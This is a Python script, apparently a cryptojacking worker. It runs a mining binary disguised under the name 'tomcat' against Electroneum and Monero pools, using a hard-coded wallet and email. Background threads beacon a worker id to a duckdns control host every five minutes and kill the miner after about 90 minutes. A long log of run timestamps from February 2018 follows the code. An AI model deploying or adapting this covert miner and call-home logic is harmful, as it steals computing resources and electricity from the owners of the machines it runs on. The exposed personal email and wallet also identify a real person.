import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:58:06.364358
#2018-02-17 16:46:06.079360
#2018-02-17 18:34:07.227359
#2018-02-17 20:22:01.423137
#2018-02-17 22:09:03.734227
#2018-02-17 23:53:01.197954
#2018-02-18 01:42:06.302343
#2018-02-18 03:29:03.462488
#2018-02-18 05:16:07.604630
#2018-02-18 07:08:06.710114
#2018-02-18 08:56:05.233376
#2018-02-18 10:43:01.346008
#2018-02-18 12:28:06.280161
#2018-02-18 14:15:09.435118
#2018-02-18 16:06:07.854297
#2018-02-18 17:54:04.148391
#2018-02-18 19:41:06.185414
#2018-02-18 21:26:01.336345
#2018-02-18 23:15:06.650432
#2018-02-19 01:03:07.323681
#2018-02-19 02:50:05.833770
#2018-02-19 04:36:04.138923
#2018-02-19 06:20:01.346997
#2018-02-19 08:08:04.975224
#2018-02-19 09:58:04.183006
#2018-02-19 11:49:01.237967
#2018-02-19 13:34:06.129068
#2018-02-19 15:23:04.343239
#2018-02-19 17:11:05.767391
#2018-02-19 18:57:01.973953
#2018-02-19 20:45:04.306346
#2018-02-19 22:32:08.123459
#2018-02-20 00:18:07.681952
#2018-02-20 02:06:03.973784
#2018-02-20 03:55:06.175014
#2018-02-20 05:40:09.614463
#2018-02-20 07:27:04.326101
#2018-02-20 09:11:06.231056
#2018-02-20 10:54:04.077505
#2018-02-20 12:42:01.727080
#2018-02-20 14:27:04.202881
#2018-02-20 16:12:06.453960
#2018-02-20 17:59:12.756315
#2018-02-20 19:51:07.073554
#2018-02-20 21:40:01.352755
#2018-02-20 23:21:04.321877
#2018-02-21 01:05:08.708490
#2018-02-21 02:51:05.699128
#2018-02-21 04:38:05.209402
#2018-02-21 06:26:04.429990
#2018-02-21 08:10:10.680366
#2018-02-21 09:57:02.105671
#2018-02-21 11:44:09.137108
#2018-02-21 13:36:06.192698
#2018-02-21 15:20:10.122056
#2018-02-21 17:11:06.723059
#2018-02-21 18:58:01.299025
#2018-02-21 20:39:01.444926
#2018-02-21 22:24:06.263663
#2018-02-22 00:14:07.779430
#2018-02-22 02:02:05.792895
#2018-02-22 03:48:03.681145
#2018-02-22 05:35:06.598213
#2018-02-22 07:20:09.574266
#2018-02-22 09:07:07.725165
#2018-02-22 10:55:02.915626
#2018-02-22 12:40:12.942788
#2018-02-22 14:26:04.065431
#2018-02-22 16:15:12.480786
#2018-02-22 18:04:01.504687
#2018-02-22 19:52:04.881741
#2018-02-22 21:42:04.790712
#2018-02-22 23:29:01.428606
#2018-02-23 01:17:01.723462
#2018-02-23 03:05:06.422216
#2018-02-23 04:53:03.614909
#2018-02-23 06:39:06.196894
#2018-02-23 08:27:07.071358
#2018-02-23 10:43:01.398899
#2018-02-23 12:40:11.891291
#2018-02-23 14:23:05.356202
#2018-02-23 16:14:07.612533
#2018-02-23 18:01:07.759352
#2018-02-23 19:47:08.615428
#2018-02-23 21:31:01.581835
#2018-02-23 23:18:07.053580
#2018-02-24 01:08:01.838604
#2018-02-24 02:58:07.434567
#2018-02-24 06:13:05.939492
#2018-02-24 08:01:05.271105
#2018-02-24 09:46:04.702161
#2018-02-24 11:42:06.415067
#2018-02-24 13:34:05.232125
#2018-02-24 15:22:07.100772
#2018-02-24 17:12:05.167879
#2018-02-24 19:03:06.879474
#2018-02-24 20:52:03.307530
#2018-02-24 23:15:08.556305
#2018-02-25 02:40:07.278155
#2018-02-25 06:28:06.079646